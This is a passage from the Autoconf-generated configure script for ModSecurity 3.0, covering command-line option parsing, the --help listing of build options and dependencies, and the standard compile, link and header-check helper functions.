--sharedstatedir | --sharedstatedi \ | --sharedstated | --sharedstate | --sharedstat | --sharedsta \ | --sharedst | --shareds | --shared | --share | --shar \ | --sha | --sh) ac_prev=sharedstatedir ;; -sharedstatedir=* | --sharedstatedir=* | --sharedstatedi=* \ | --sharedstated=* | --sharedstate=* | --sharedstat=* | --sharedsta=* \ | --sharedst=* | --shareds=* | --shared=* | --share=* | --shar=* \ | --sha=* | --sh=*) sharedstatedir=$ac_optarg ;; -site | --site | --sit) ac_prev=site ;; -site=* | --site=* | --sit=*) site=$ac_optarg ;; -srcdir | --srcdir | --srcdi | --srcd | --src | --sr) ac_prev=srcdir ;; -srcdir=* | --srcdir=* | --srcdi=* | --srcd=* | --src=* | --sr=*) srcdir=$ac_optarg ;; -sysconfdir | --sysconfdir | --sysconfdi | --sysconfd | --sysconf \ | --syscon | --sysco | --sysc | --sys | --sy) ac_prev=sysconfdir ;; -sysconfdir=* | --sysconfdir=* | --sysconfdi=* | --sysconfd=* | --sysconf=* \ | --syscon=* | --sysco=* | --sysc=* | --sys=* | --sy=*) sysconfdir=$ac_optarg ;; -target | --target | --targe | --targ | --tar | --ta | --t) ac_prev=target_alias ;; -target=* | --target=* | --targe=* | --targ=* | --tar=* | --ta=* | --t=*) target_alias=$ac_optarg ;; -v | -verbose | --verbose | --verbos | --verbo | --verb) verbose=yes ;; -version | --version | --versio | --versi | --vers | -V) ac_init_version=: ;; -with-* | --with-*) ac_useropt=`expr "x$ac_option" : 'x-*with-\([^=]*\)'` # Reject names that are not valid shell variable names. expr "x$ac_useropt" : ".*[^-+._$as_cr_alnum]" >/dev/null && as_fn_error $? "invalid package name: $ac_useropt" ac_useropt_orig=$ac_useropt ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'` case $ac_user_opts in *" "with_$ac_useropt" "*) ;; *) ac_unrecognized_opts="$ac_unrecognized_opts$ac_unrecognized_sep--with-$ac_useropt_orig" ac_unrecognized_sep=', ';; esac eval with_$ac_useropt=\$ac_optarg ;; -without-* | --without-*) ac_useropt=`expr "x$ac_option" : 'x-*without-\(.*\)'` # Reject names that are not valid shell variable names. expr "x$ac_useropt" : ".*[^-+._$as_cr_alnum]" >/dev/null && as_fn_error $? "invalid package name: $ac_useropt" ac_useropt_orig=$ac_useropt ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'` case $ac_user_opts in *" "with_$ac_useropt" "*) ;; *) ac_unrecognized_opts="$ac_unrecognized_opts$ac_unrecognized_sep--without-$ac_useropt_orig" ac_unrecognized_sep=', ';; esac eval with_$ac_useropt=no ;; --x) # Obsolete; use --with-x. with_x=yes ;; -x-includes | --x-includes | --x-include | --x-includ | --x-inclu \ | --x-incl | --x-inc | --x-in | --x-i) ac_prev=x_includes ;; -x-includes=* | --x-includes=* | --x-include=* | --x-includ=* | --x-inclu=* \ | --x-incl=* | --x-inc=* | --x-in=* | --x-i=*) x_includes=$ac_optarg ;; -x-libraries | --x-libraries | --x-librarie | --x-librari \ | --x-librar | --x-libra | --x-libr | --x-lib | --x-li | --x-l) ac_prev=x_libraries ;; -x-libraries=* | --x-libraries=* | --x-librarie=* | --x-librari=* \ | --x-librar=* | --x-libra=* | --x-libr=* | --x-lib=* | --x-li=* | --x-l=*) x_libraries=$ac_optarg ;; -*) as_fn_error $? "unrecognized option: \`$ac_option' Try \`$0 --help' for more information" ;; *=*) ac_envvar=`expr "x$ac_option" : 'x\([^=]*\)='` # Reject names that are not valid shell variable names. case $ac_envvar in #( '' | [0-9]* | *[!_$as_cr_alnum]* ) as_fn_error $? "invalid variable name: \`$ac_envvar'" ;; esac eval $ac_envvar=\$ac_optarg export $ac_envvar ;; *) # FIXME: should be removed in autoconf 3.0. $as_echo "$as_me: WARNING: you should use --build, --host, --target" >&2 expr "x$ac_option" : ".*[^-._$as_cr_alnum]" >/dev/null && $as_echo "$as_me: WARNING: invalid host type: $ac_option" >&2 : "${build_alias=$ac_option} ${host_alias=$ac_option} ${target_alias=$ac_option}" ;; esac done if test -n "$ac_prev"; then ac_option=--`echo $ac_prev | sed 's/_/-/g'` as_fn_error $? "missing argument to $ac_option" fi if test -n "$ac_unrecognized_opts"; then case $enable_option_checking in no) ;; fatal) as_fn_error $? "unrecognized options: $ac_unrecognized_opts" ;; *) $as_echo "$as_me: WARNING: unrecognized options: $ac_unrecognized_opts" >&2 ;; esac fi # Check all directory arguments for consistency. for ac_var in exec_prefix prefix bindir sbindir libexecdir datarootdir \ datadir sysconfdir sharedstatedir localstatedir includedir \ oldincludedir docdir infodir htmldir dvidir pdfdir psdir \ libdir localedir mandir do eval ac_val=\$$ac_var # Remove trailing slashes. case $ac_val in */ ) ac_val=`expr "X$ac_val" : 'X\(.*[^/]\)' \| "X$ac_val" : 'X\(.*\)'` eval $ac_var=\$ac_val;; esac # Be sure to have absolute directory names. case $ac_val in [\\/$]* | ?:[\\/]* ) continue;; NONE | '' ) case $ac_var in *prefix ) continue;; esac;; esac as_fn_error $? "expected an absolute directory name for --$ac_var: $ac_val" done # There might be people who depend on the old broken behavior: `$host' # used to hold the argument of --host etc. # FIXME: To remove some day. build=$build_alias host=$host_alias target=$target_alias # FIXME: To remove some day. if test "x$host_alias" != x; then if test "x$build_alias" = x; then cross_compiling=maybe elif test "x$build_alias" != "x$host_alias"; then cross_compiling=yes fi fi ac_tool_prefix= test -n "$host_alias" && ac_tool_prefix=$host_alias- test "$silent" = yes && exec 6>/dev/null ac_pwd=`pwd` && test -n "$ac_pwd" && ac_ls_di=`ls -di .` && ac_pwd_ls_di=`cd "$ac_pwd" && ls -di .` || as_fn_error $? "working directory cannot be determined" test "X$ac_ls_di" = "X$ac_pwd_ls_di" || as_fn_error $? "pwd does not report name of working directory" # Find the source files, if location was not specified. if test -z "$srcdir"; then ac_srcdir_defaulted=yes # Try the directory containing this script, then the parent directory. ac_confdir=`$as_dirname -- "$as_myself" || $as_expr X"$as_myself" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ X"$as_myself" : 'X\(//\)[^/]' \| \ X"$as_myself" : 'X\(//\)$' \| \ X"$as_myself" : 'X\(/\)' \| . 2>/dev/null || $as_echo X"$as_myself" | sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ s//\1/ q } /^X\(\/\/\)[^/].*/{ s//\1/ q } /^X\(\/\/\)$/{ s//\1/ q } /^X\(\/\).*/{ s//\1/ q } s/.*/./; q'` srcdir=$ac_confdir if test ! -r "$srcdir/$ac_unique_file"; then srcdir=.. fi else ac_srcdir_defaulted=no fi if test ! -r "$srcdir/$ac_unique_file"; then test "$ac_srcdir_defaulted" = yes && srcdir="$ac_confdir or .." as_fn_error $? "cannot find sources ($ac_unique_file) in $srcdir" fi ac_msg="sources are in $srcdir, but \`cd $srcdir' does not work" ac_abs_confdir=`( cd "$srcdir" && test -r "./$ac_unique_file" || as_fn_error $? "$ac_msg" pwd)` # When building in place, set srcdir=. if test "$ac_abs_confdir" = "$ac_pwd"; then srcdir=. fi # Remove unnecessary trailing slashes from srcdir. # Double slashes in file names in object file debugging info # mess up M-x gdb in Emacs. case $srcdir in */) srcdir=`expr "X$srcdir" : 'X\(.*[^/]\)' \| "X$srcdir" : 'X\(.*\)'`;; esac for ac_var in $ac_precious_vars; do eval ac_env_${ac_var}_set=\${${ac_var}+set} eval ac_env_${ac_var}_value=\$${ac_var} eval ac_cv_env_${ac_var}_set=\${${ac_var}+set} eval ac_cv_env_${ac_var}_value=\$${ac_var} done # # Report the --help message. # if test "$ac_init_help" = "long"; then # Omit some internal or obsolete options to make the list less imposing. # This message is too long to be a string in the A/UX 3.1 sh. cat <<_ACEOF \`configure' configures modsecurity 3.0 to adapt to many kinds of systems. Usage: $0 [OPTION]... [VAR=VALUE]... To assign environment variables (e.g., CC, CFLAGS...), specify them as VAR=VALUE. See below for descriptions of some of the useful variables. Defaults for the options are specified in brackets. Configuration: -h, --help display this help and exit --help=short display options specific to this package --help=recursive display the short help of all the included packages -V, --version display version information and exit -q, --quiet, --silent do not print \`checking ...' messages --cache-file=FILE cache test results in FILE [disabled] -C, --config-cache alias for \`--cache-file=config.cache' -n, --no-create do not create output files --srcdir=DIR find the sources in DIR [configure dir or \`..'] Installation directories: --prefix=PREFIX install architecture-independent files in PREFIX [$ac_default_prefix] --exec-prefix=EPREFIX install architecture-dependent files in EPREFIX [PREFIX] By default, \`make install' will install all the files in \`$ac_default_prefix/bin', \`$ac_default_prefix/lib' etc. You can specify an installation prefix other than \`$ac_default_prefix' using \`--prefix', for instance \`--prefix=\$HOME'. For better control, use the options below. Fine tuning of the installation directories: --bindir=DIR user executables [EPREFIX/bin] --sbindir=DIR system admin executables [EPREFIX/sbin] --libexecdir=DIR program executables [EPREFIX/libexec] --sysconfdir=DIR read-only single-machine data [PREFIX/etc] --sharedstatedir=DIR modifiable architecture-independent data [PREFIX/com] --localstatedir=DIR modifiable single-machine data [PREFIX/var] --libdir=DIR object code libraries [EPREFIX/lib] --includedir=DIR C header files [PREFIX/include] --oldincludedir=DIR C header files for non-gcc [/usr/include] --datarootdir=DIR read-only arch.-independent data root [PREFIX/share] --datadir=DIR read-only architecture-independent data [DATAROOTDIR] --infodir=DIR info documentation [DATAROOTDIR/info] --localedir=DIR locale-dependent data [DATAROOTDIR/locale] --mandir=DIR man documentation [DATAROOTDIR/man] --docdir=DIR documentation root [DATAROOTDIR/doc/modsecurity] --htmldir=DIR html documentation [DOCDIR] --dvidir=DIR dvi documentation [DOCDIR] --pdfdir=DIR pdf documentation [DOCDIR] --psdir=DIR ps documentation [DOCDIR] _ACEOF cat <<\_ACEOF Program names: --program-prefix=PREFIX prepend PREFIX to installed program names --program-suffix=SUFFIX append SUFFIX to installed program names --program-transform-name=PROGRAM run sed PROGRAM on installed program names System types: --build=BUILD configure for building on BUILD [guessed] --host=HOST cross-compile to build programs to run on HOST [BUILD] _ACEOF fi if test -n "$ac_init_help"; then case $ac_init_help in short | recursive ) echo "Configuration of modsecurity 3.0:";; esac cat <<\_ACEOF Optional Features: --disable-option-checking ignore unrecognized --enable/--with options --disable-FEATURE do not include FEATURE (same as --enable-FEATURE=no) --enable-FEATURE[=ARG] include FEATURE [ARG=yes] --enable-silent-rules less verbose build output (undo: "make V=1") --disable-silent-rules verbose build output (undo: "make V=0") --enable-dependency-tracking do not reject slow dependency extractors --disable-dependency-tracking speeds up one-time build --enable-shared[=PKGS] build shared libraries [default=yes] --enable-static[=PKGS] build static libraries [default=yes] --enable-fast-install[=PKGS] optimize for fast installation [default=yes] --disable-libtool-lock avoid locking (might break parallel builds) --disable-debug-logs Turn off the SecDebugLog feature --enable-afl-fuzz Turn on the afl fuzzer compilation utilities --enable-examples Turn on the examples compilation (default option) --enable-parser-generation Enables parser generation during the build --enable-mutex-on-pm Treats pm operations as a critical section --disable-doxygen-doc don't generate any doxygen documentation --enable-doxygen-dot generate graphics for doxygen documentation --enable-doxygen-man generate doxygen manual pages --enable-doxygen-rtf generate doxygen RTF documentation --enable-doxygen-xml generate doxygen XML documentation --enable-doxygen-chm generate doxygen compressed HTML help documentation --enable-doxygen-chi generate doxygen seperate compressed HTML help index file --disable-doxygen-html don't generate doxygen plain HTML documentation --enable-doxygen-ps generate doxygen PostScript documentation --enable-doxygen-pdf generate doxygen PDF documentation --enable-valgrind Whether to enable Valgrind on the unit tests --disable-valgrind-memcheck Whether to skip memcheck during the Valgrind tests --disable-valgrind-helgrind Whether to skip helgrind during the Valgrind tests --disable-valgrind-drd Whether to skip drd during the Valgrind tests --enable-valgrind-sgcheck Whether to use sgcheck during the Valgrind tests Optional Packages: --with-PACKAGE[=ARG] use PACKAGE [ARG=yes] --without-PACKAGE do not use PACKAGE (same as --with-PACKAGE=no) --with-yajl=PATH Path to yajl prefix or config script --with-geoip=PATH Path to GeoIP (including headers). Use 'no' to disable GeoIP support. --with-maxmind=PATH Path to MaxMind (including headers). Use 'no' to disable MaxMind support. --with-lmdb=PATH Path to lmdb prefix or config script --with-ssdeep=PATH Path to ssdeep prefix --with-lua=PATH Path to lua prefix --with-curl=PATH Path to curl prefix or config script --with-libxml=PATH Path to libxml2 prefix or config script --with-pcre=PATH Path to pcre prefix or config script --with-pic[=PKGS] try to use only PIC/non-PIC objects [default=use both] --with-aix-soname=aix|svr4|both shared library versioning (aka "SONAME") variant to provide on AIX, [default=aix]. --with-gnu-ld assume the C compiler uses GNU ld [default=no] --with-sysroot[=DIR] Search for dependent libraries within DIR (or the compiler's sysroot if not specified). Some influential environment variables: CXX C++ compiler command CXXFLAGS C++ compiler flags LDFLAGS linker flags, e.g. -L if you have libraries in a nonstandard directory LIBS libraries to pass to the linker, e.g. -l CPPFLAGS (Objective) C/C++ preprocessor flags, e.g. -I if you have headers in a nonstandard directory CC C compiler command CFLAGS C compiler flags PKG_CONFIG path to pkg-config utility PKG_CONFIG_PATH directories to add to pkg-config's search path PKG_CONFIG_LIBDIR path overriding pkg-config's built-in search path CPP C preprocessor LT_SYS_LIBRARY_PATH User-defined run-time library search path. CXXCPP C++ preprocessor YACC The `Yet Another Compiler Compiler' implementation to use. Defaults to the first program found out of: `bison -y', `byacc', `yacc'. YFLAGS The list of arguments that will be passed by default to $YACC. This script will default YFLAGS to the empty string to avoid a default value of `-d' given by some make applications. DOXYGEN_PAPER_SIZE a4wide (default), a4, letter, legal or executive Use these variables to override the choices made by `configure' or to help it to find libraries and programs with nonstandard names/locations. Report bugs to . _ACEOF ac_status=$? fi if test "$ac_init_help" = "recursive"; then # If there are subdirs, report their specific --help. for ac_dir in : $ac_subdirs_all; do test "x$ac_dir" = x: && continue test -d "$ac_dir" || { cd "$srcdir" && ac_pwd=`pwd` && srcdir=. && test -d "$ac_dir"; } || continue ac_builddir=. case "$ac_dir" in .) ac_dir_suffix= ac_top_builddir_sub=. ac_top_build_prefix= ;; *) ac_dir_suffix=/`$as_echo "$ac_dir" | sed 's|^\.[\\/]||'` # A ".." for each directory in $ac_dir_suffix. ac_top_builddir_sub=`$as_echo "$ac_dir_suffix" | sed 's|/[^\\/]*|/..|g;s|/||'` case $ac_top_builddir_sub in "") ac_top_builddir_sub=. ac_top_build_prefix= ;; *) ac_top_build_prefix=$ac_top_builddir_sub/ ;; esac ;; esac ac_abs_top_builddir=$ac_pwd ac_abs_builddir=$ac_pwd$ac_dir_suffix # for backward compatibility: ac_top_builddir=$ac_top_build_prefix case $srcdir in .) # We are building in place. ac_srcdir=. ac_top_srcdir=$ac_top_builddir_sub ac_abs_top_srcdir=$ac_pwd ;; [\\/]* | ?:[\\/]* ) # Absolute name. ac_srcdir=$srcdir$ac_dir_suffix; ac_top_srcdir=$srcdir ac_abs_top_srcdir=$srcdir ;; *) # Relative name. ac_srcdir=$ac_top_build_prefix$srcdir$ac_dir_suffix ac_top_srcdir=$ac_top_build_prefix$srcdir ac_abs_top_srcdir=$ac_pwd/$srcdir ;; esac ac_abs_srcdir=$ac_abs_top_srcdir$ac_dir_suffix cd "$ac_dir" || { ac_status=$?; continue; } # Check for guested configure. if test -f "$ac_srcdir/configure.gnu"; then echo && $SHELL "$ac_srcdir/configure.gnu" --help=recursive elif test -f "$ac_srcdir/configure"; then echo && $SHELL "$ac_srcdir/configure" --help=recursive else $as_echo "$as_me: WARNING: no configuration information is in $ac_dir" >&2 fi || ac_status=$? cd "$ac_pwd" || { ac_status=$?; break; } done fi test -n "$ac_init_help" && exit $ac_status if $ac_init_version; then cat <<\_ACEOF modsecurity configure 3.0 generated by GNU Autoconf 2.69 Copyright (C) 2012 Free Software Foundation, Inc. This configure script is free software; the Free Software Foundation gives unlimited permission to copy, distribute and modify it. _ACEOF exit fi ## ------------------------ ## ## Autoconf initialization. ## ## ------------------------ ## # ac_fn_cxx_try_compile LINENO # ---------------------------- # Try to compile conftest.$ac_ext, and return whether this succeeded. ac_fn_cxx_try_compile () { as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack rm -f conftest.$ac_objext if { { ac_try="$ac_compile" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" $as_echo "$ac_try_echo"; } >&5 (eval "$ac_compile") 2>conftest.err ac_status=$? if test -s conftest.err; then grep -v '^ *+' conftest.err >conftest.er1 cat conftest.er1 >&5 mv -f conftest.er1 conftest.err fi $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } && { test -z "$ac_cxx_werror_flag" || test ! -s conftest.err } && test -s conftest.$ac_objext; then : ac_retval=0 else $as_echo "$as_me: failed program was:" >&5 sed 's/^/| /' conftest.$ac_ext >&5 ac_retval=1 fi eval $as_lineno_stack; ${as_lineno_stack:+:} unset as_lineno as_fn_set_status $ac_retval } # ac_fn_cxx_try_compile # ac_fn_c_try_compile LINENO # -------------------------- # Try to compile conftest.$ac_ext, and return whether this succeeded. ac_fn_c_try_compile () { as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack rm -f conftest.$ac_objext if { { ac_try="$ac_compile" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" $as_echo "$ac_try_echo"; } >&5 (eval "$ac_compile") 2>conftest.err ac_status=$? if test -s conftest.err; then grep -v '^ *+' conftest.err >conftest.er1 cat conftest.er1 >&5 mv -f conftest.er1 conftest.err fi $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } && { test -z "$ac_c_werror_flag" || test ! -s conftest.err } && test -s conftest.$ac_objext; then : ac_retval=0 else $as_echo "$as_me: failed program was:" >&5 sed 's/^/| /' conftest.$ac_ext >&5 ac_retval=1 fi eval $as_lineno_stack; ${as_lineno_stack:+:} unset as_lineno as_fn_set_status $ac_retval } # ac_fn_c_try_compile # ac_fn_c_try_cpp LINENO # ---------------------- # Try to preprocess conftest.$ac_ext, and return whether this succeeded. ac_fn_c_try_cpp () { as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack if { { ac_try="$ac_cpp conftest.$ac_ext" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" $as_echo "$ac_try_echo"; } >&5 (eval "$ac_cpp conftest.$ac_ext") 2>conftest.err ac_status=$? if test -s conftest.err; then grep -v '^ *+' conftest.err >conftest.er1 cat conftest.er1 >&5 mv -f conftest.er1 conftest.err fi $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } > conftest.i && { test -z "$ac_c_preproc_warn_flag$ac_c_werror_flag" || test ! -s conftest.err }; then : ac_retval=0 else $as_echo "$as_me: failed program was:" >&5 sed 's/^/| /' conftest.$ac_ext >&5 ac_retval=1 fi eval $as_lineno_stack; ${as_lineno_stack:+:} unset as_lineno as_fn_set_status $ac_retval } # ac_fn_c_try_cpp # ac_fn_c_try_run LINENO # ---------------------- # Try to link conftest.$ac_ext, and return whether this succeeded. Assumes # that executables *can* be run. ac_fn_c_try_run () { as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack if { { ac_try="$ac_link" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" $as_echo "$ac_try_echo"; } >&5 (eval "$ac_link") 2>&5 ac_status=$? $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } && { ac_try='./conftest$ac_exeext' { { case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" $as_echo "$ac_try_echo"; } >&5 (eval "$ac_try") 2>&5 ac_status=$? $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; }; }; then : ac_retval=0 else $as_echo "$as_me: program exited with status $ac_status" >&5 $as_echo "$as_me: failed program was:" >&5 sed 's/^/| /' conftest.$ac_ext >&5 ac_retval=$ac_status fi rm -rf conftest.dSYM conftest_ipa8_conftest.oo eval $as_lineno_stack; ${as_lineno_stack:+:} unset as_lineno as_fn_set_status $ac_retval } # ac_fn_c_try_run # ac_fn_c_check_header_mongrel LINENO HEADER VAR INCLUDES # ------------------------------------------------------- # Tests whether HEADER exists, giving a warning if it cannot be compiled using # the include files in INCLUDES and setting the cache variable VAR # accordingly. ac_fn_c_check_header_mongrel () { as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack if eval \${$3+:} false; then : { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $2" >&5 $as_echo_n "checking for $2... " >&6; } if eval \${$3+:} false; then : $as_echo_n "(cached) " >&6 fi eval ac_res=\$$3 { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_res" >&5 $as_echo "$ac_res" >&6; } else # Is the header compilable? { $as_echo "$as_me:${as_lineno-$LINENO}: checking $2 usability" >&5 $as_echo_n "checking $2 usability... " >&6; } cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ $4 #include <$2> _ACEOF if ac_fn_c_try_compile "$LINENO"; then : ac_header_compiler=yes else ac_header_compiler=no fi rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_header_compiler" >&5 $as_echo "$ac_header_compiler" >&6; } # Is the header present? { $as_echo "$as_me:${as_lineno-$LINENO}: checking $2 presence" >&5 $as_echo_n "checking $2 presence... " >&6; } cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include <$2> _ACEOF if ac_fn_c_try_cpp "$LINENO"; then : ac_header_preproc=yes else ac_header_preproc=no fi rm -f conftest.err conftest.i conftest.$ac_ext { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_header_preproc" >&5 $as_echo "$ac_header_preproc" >&6; } # So? What about this header? case $ac_header_compiler:$ac_header_preproc:$ac_c_preproc_warn_flag in #(( yes:no: ) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: accepted by the compiler, rejected by the preprocessor!" >&5 $as_echo "$as_me: WARNING: $2: accepted by the compiler, rejected by the preprocessor!" >&2;} { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: proceeding with the compiler's result" >&5 $as_echo "$as_me: WARNING: $2: proceeding with the compiler's result" >&2;} ;; no:yes:* ) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: present but cannot be compiled" >&5 $as_echo "$as_me: WARNING: $2: present but cannot be compiled" >&2;} { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: check for missing prerequisite headers?" >&5 $as_echo "$as_me: WARNING: $2: check for missing prerequisite headers?" >&2;} { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: see the Autoconf documentation" >&5 $as_echo "$as_me: WARNING: $2: see the Autoconf documentation" >&2;} { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: section \"Present But Cannot Be Compiled\"" >&5 $as_echo "$as_me: WARNING: $2: section \"Present But Cannot Be Compiled\"" >&2;} { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: proceeding with the compiler's result" >&5 $as_echo "$as_me: WARNING: $2: proceeding with the compiler's result" >&2;} ( $as_echo "## --------------------------------------- ## ## Report this to security@modsecurity.org ## ## --------------------------------------- ##" ) | sed "s/^/$as_me: WARNING: /" >&2 ;; esac { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $2" >&5 $as_echo_n "checking for $2... " >&6; } if eval \${$3+:} false; then : $as_echo_n "(cached) " >&6 else eval "$3=\$ac_header_compiler" fi eval ac_res=\$$3 { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_res" >&5 $as_echo "$ac_res" >&6; } fi eval $as_lineno_stack; ${as_lineno_stack:+:} unset as_lineno } # ac_fn_c_check_header_mongrel # ac_fn_c_check_header_compile LINENO HEADER VAR INCLUDES # ------------------------------------------------------- # Tests whether HEADER exists and can be compiled using the include files in # INCLUDES, setting the cache variable VAR accordingly. ac_fn_c_check_header_compile () { as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $2" >&5 $as_echo_n "checking for $2... " >&6; } if eval \${$3+:} false; then : $as_echo_n "(cached) " >&6 else cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ $4 #include <$2> _ACEOF if ac_fn_c_try_compile "$LINENO"; then : eval "$3=yes" else eval "$3=no" fi rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext fi eval ac_res=\$$3 { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_res" >&5 $as_echo "$ac_res" >&6; } eval $as_lineno_stack; ${as_lineno_stack:+:} unset as_lineno } # ac_fn_c_check_header_compile # ac_fn_c_try_link LINENO # ----------------------- # Try to link conftest.$ac_ext, and return whether this succeeded. ac_fn_c_try_link () { as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack rm -f conftest.$ac_objext conftest$ac_exeext if { { ac_try="$ac_link" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" $as_echo "$ac_try_echo"; } >&5 (eval "$ac_link") 2>conftest.err ac_status=$? if test -s conftest.err; then grep -v '^ *+' conftest.err >conftest.er1 cat conftest.er1 >&5 mv -f conftest.er1 conftest.err fi $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } && { test -z "$ac_c_werror_flag" || test ! -s conftest.err } && test -s conftest$ac_exeext && { test "$cross_compiling" = yes || test -x conftest$ac_exeext }; then : ac_retval=0 else $as_echo "$as_me: failed program was:" >&5 sed 's/^/| /' conftest.$ac_ext >&5 ac_retval=1 fi # Delete the IPA/IPO (Inter Procedural Analysis/Optimization) information # created by the PGI compiler (conftest_ipa8_conftest.oo), as it would # interfere with the next link command; also delete a directory that is # left behind by Apple's compiler. We do this before executing the actions. rm -rf conftest.dSYM conftest_ipa8_conftest.oo eval $as_lineno_stack; ${as_lineno_stack:+:} unset as_lineno as_fn_set_status $ac_retval } # ac_fn_c_try_link # ac_fn_c_check_func LINENO FUNC VAR # ---------------------------------- # Tests whether FUNC exists, setting the cache variable VAR accordingly ac_fn_c_check_func () { as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $2" >&5 $as_echo_n "checking for $2... " >&6; } if eval \${$3+:} false; then : $as_echo_n "(cached) " >&6 else cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ /* Define $2 to an innocuous variant, in case declares $2. For example, HP-UX 11i declares gettimeofday. */ #define $2 innocuous_$2 /* System header to define __stub macros and hopefully few prototypes, which can conflict with char $2 (); below. Prefer to if __STDC__ is defined, since exists even on freestanding compilers. */ #ifdef __STDC__ # include #else # include #endif #undef $2 /* Override any GCC internal prototype to avoid an error. Use char because int might match the return type of a GCC builtin and then its argument prototype would still apply. */ #ifdef __cplusplus extern "C" #endif char $2 (); /* The GNU C library defines this for functions which it implements to always fail with ENOSYS. Some functions are actually named something starting with __ and the normal name is an alias. */ #if defined __stub_$2 || defined __stub___$2 choke me #endif int main () { return $2 (); ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO"; then : eval "$3=yes" else eval "$3=no" fi rm -f core conftest.err conftest.$ac_objext \ conftest$ac_exeext conftest.$ac_ext fi eval ac_res=\$$3 { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_res" >&5 $as_echo "$ac_res" >&6; } eval $as_lineno_stack; ${as_lineno_stack:+:} unset as_lineno } # ac_fn_c_check_func # ac_fn_cxx_try_cpp LINENO # ------------------------ # Try to preprocess conftest.$ac_ext, and return whether this succeeded. ac_fn_cxx_try_cpp () { as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack if { { ac_try="$ac_cpp conftest.$ac_ext" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" $as_echo "$ac_try_echo"; } >&5 (eval "$ac_cpp conftest.$ac_ext") 2>conftest.err ac_status=$? if test -s conftest.err; then grep -v '^ *+' conftest.err >conftest.er1 cat conftest.er1 >&5 mv -f conftest.er1 conftest.err fi $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } > conftest.i && { test -z "$ac_cxx_preproc_warn_flag$ac_cxx_werror_flag" || test ! -s conftest.err }; then : ac_retval=0 else $as_echo "$as_me: failed program was:" >&5 sed 's/^/| /' conftest.$ac_ext >&5 ac_retval=1 fi eval $as_lineno_stack; ${as_lineno_stack:+:} unset as_lineno as_fn_set_status $ac_retval } # ac_fn_cxx_try_cpp # ac_fn_cxx_try_link LINENO # ------------------------- # Try to link conftest.$ac_ext, and return whether this succeeded. ac_fn_cxx_try_link () { as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack rm -f 